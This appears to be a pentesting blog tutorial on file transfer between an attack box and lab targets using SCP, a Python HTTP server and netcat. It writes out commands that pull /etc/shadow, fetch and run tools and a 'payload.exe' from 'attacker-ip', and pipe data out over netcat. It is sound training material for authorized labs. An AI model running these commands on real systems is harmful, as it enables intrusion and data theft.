When I set up my homelab for PNPT prep, I did what most beginners do: shared folders between my attack machine and target VMs. Drag, drop, done. It felt efficient.

Then they broke mid-lab. Permission errors. VirtioFS conflicts. Mounts that simply disappeared. And it hit me: this convenience does not exist in real engagements. I was training myself for a scenario that would never happen.

In a real penetration test, you have network access and a command line. That is it. If your file transfer method requires guest tools, it will not survive contact with a real target.

These are the three methods that actually matter.

1. SCP: Reliable When You Have SSH

SSH is not just for remote access. It is your most reliable file transfer option, and it works wherever SSH is available.

# Set up key-based authentication once
ssh-keygen -t ed25519 -f ~/.ssh/lab_key
ssh-copy-id -i ~/.ssh/lab_key user@target

After that, transfers work without passwords:

# Upload a tool to the target (-i selects the lab key created above)
scp -i ~/.ssh/lab_key linpeas.sh user@10.10.10.50:~/
# Download evidence
scp -i ~/.ssh/lab_key user@10.10.10.50:/etc/shadow ./evidence/
# Transfer multiple files at once
scp -i ~/.ssh/lab_key *.py user@internal-server:/tmp/

If SCP is not an option because you do not have direct SSH access to the target, the next method covers you.

2. Python HTTP Server: Instant File Staging

One command, no installation, works on any OS with wget or curl.

# On your attack machine
cd ~/pentest-tools
python3 -m http.server 8080

Pulling files from a Linux target:

wget http://attacker-ip:8080/linpeas.sh
curl -O http://attacker-ip:8080/exploit.py

From a Windows target with PowerShell:

Invoke-WebRequest -Uri "http://attacker-ip:8080/nc.exe" -OutFile "nc.exe"

Or via certutil when PowerShell is restricted:

certutil -urlcache -split -f "http://attacker-ip:8080/payload.exe" payload.exe

If port 8080 is filtered, try 9000 or 4444. The server logs all requests automatically, which is useful for keeping track of what was transferred during an engagement.
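
The request log mentioned above can be turned into a per-host transfer record for the report. This is an added example, not code from the original article; it assumes the server was started as `python3 -m http.server 8080 2> transfers.log` so the log lines land in a file, and the sample log lines, addresses and dates below are constructed.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample of what http.server writes to stderr;
# addresses, dates and the failed request are placeholders.
SAMPLE_LOG = """\
10.10.10.50 - - [12/Mar/2025 14:03:22] "GET /linpeas.sh HTTP/1.1" 200 -
10.10.10.50 - - [12/Mar/2025 14:05:10] code 404, message File not found
10.10.10.50 - - [12/Mar/2025 14:05:10] "GET /pspy32 HTTP/1.1" 404 -
10.10.10.50 - - [12/Mar/2025 14:05:31] "GET /pspy64 HTTP/1.1" 200 -
10.10.1.50 - - [12/Mar/2025 15:40:02] "GET /linpeas.sh HTTP/1.1" 200 -
"""

# Layout: client - - [timestamp] "METHOD path PROTOCOL" status size
REQUEST = re.compile(
    r'^(?P<client>\S+) - - \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

def parse_transfers(log_text):
    """Return one record per logged request; 'code NNN, message' lines are skipped."""
    records = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue
        records.append({
            "client": m["client"],
            "time": datetime.strptime(m["ts"], "%d/%b/%Y %H:%M:%S"),
            "path": m["path"],
            "status": int(m["status"]),
        })
    return records

def delivered_by_host(records):
    """Map each client to the files it actually received (HTTP 200), in time order."""
    delivered = defaultdict(list)
    for r in sorted(records, key=lambda r: r["time"]):
        if r["status"] == 200:
            delivered[r["client"]].append(r["path"])
    return dict(delivered)

if __name__ == "__main__":
    for host, files in delivered_by_host(parse_transfers(SAMPLE_LOG)).items():
        print(host, files)
```

Requests that ended in 404 stay in the parsed records but are left out of the per-host summary, so the report lists only files that actually reached a host.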

3. Netcat: When Everything Else Is Blocked

Netcat handles raw data transfer with minimal setup, when it is available on the target. It works in restricted shells where wget and curl are not available.

# Receive a file (on your attack machine): start the listener first
# (OpenBSD-variant netcat takes the port without -p: nc -l 9999)
nc -l -p 9999 > evidence.sql
# Send a file (from the target)
nc attacker-ip 9999 < sample-data.sql

Reversed, when pushing a tool to the target:

# Attack machine sends
nc -l -p 9999 < tool.sh
# Target receives
nc attacker-ip 9999 > tool.sh

For large files, combine the transfer with compression:

tar czf - /opt/backup/ | nc attacker-ip 9999

What This Looks Like in Practice

These examples are intended for authorized labs, certification environments, and approved penetration tests only.

Initial foothold: you have a shell but need enumeration tools.

wget http://attack-box:8080/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh | tee linpeas-output.txt

Privilege escalation: a specific tool is needed.

curl http://attack-box:8080/pspy64 -o pspy64
chmod +x pspy64
./pspy64 -pf -i 1000

Retrieving evidence: collecting proof for your report.

tar czf evidence.tar.gz /opt/backup/sample-data/
nc attack-box 9999 < evidence.tar.gz

Lateral movement: pushing a tool to an internal host.

scp exploit.py user@10.10.1.50:~/
ssh user@10.10.1.50 'python3 exploit.py'

Common Problems

SSH connection refused:

sudo systemctl enable ssh --now
sudo ufw allow ssh

HTTP server not reachable:

ss -tlnp | grep :8080 # Check whether it is listening
ping target-ip # Test connectivity

Permission issues:

chmod +x script.sh
ls -la /path/to/directory/

Most file transfer problems are actually network or permission problems. Always check the connection before adjusting the transfer method.

Quick Reference

Save this for your next engagement:

# SCP
scp file.txt user@target:~/
scp user@target:/path/to/file.txt ./
# HTTP server
python3 -m http.server 8080
wget http://attacker-ip:8080/file.txt
# Netcat
nc -l -p 9999 < file.txt # send
nc target-ip 9999 > file.txt # receive

The habits you build in your lab follow you into real engagements. Practicing with methods that work in the real world makes your preparation for PNPT, CPTS, and actual penetration tests considerably stronger.

I cover practical pentesting techniques and certification prep in Dutch at MB Cyberworks, including the full Dutch version of this article.